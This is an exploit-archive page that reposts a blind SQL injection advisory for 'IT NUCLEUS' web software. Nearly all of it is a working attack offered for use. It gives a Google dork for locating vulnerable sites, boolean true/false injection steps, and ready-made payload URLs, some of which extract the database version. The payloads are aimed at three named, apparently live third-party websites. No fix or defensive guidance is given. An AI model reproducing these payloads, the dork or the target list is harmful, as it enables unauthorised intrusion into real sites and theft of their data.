Advertisement






IT NUCLEUS - Blind Sql Injection

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2024-01-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010017

Below is a copy:

IT NUCLEUS - Blind Sql Injection
*********************************************************
#Exploit Title: IT NUCLEUS - Blind Sql Injection
#Date: 2024-01-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by IT NUCLEUS"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://www.nitrogenium.co.in/features-product.php?id=45%27%20and%20true--+
* https://www.nitrogenium.co.in/features-product.php?id=45%27%20and%20false--+
* https://www.nitrogenium.co.in/features-product.php?id=45%27%20and%20/*!12345substring(@@version,1,1)*/=5--+
### Demo 2:
* http://www.jaishreeindustries.com/features-product.php?id=12%27%20and%20true--+
* http://www.jaishreeindustries.com/features-product.php?id=12%27%20and%20false--+
* http://www.jaishreeindustries.com/features-product.php?id=12%27%20and%20/*!12345substring(@@version,1,1)*/=5--+
### Demo 3:
* https://www.careermovez.com/current-job-detail.php?id=5%27%20and%20true--+
* https://www.careermovez.com/current-job-detail.php?id=5%27%20and%20false--+
* https://www.careermovez.com/current-job-detail.php?id=5%27%20and%20/*!12345substring(@@version,1,1)*/=5--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.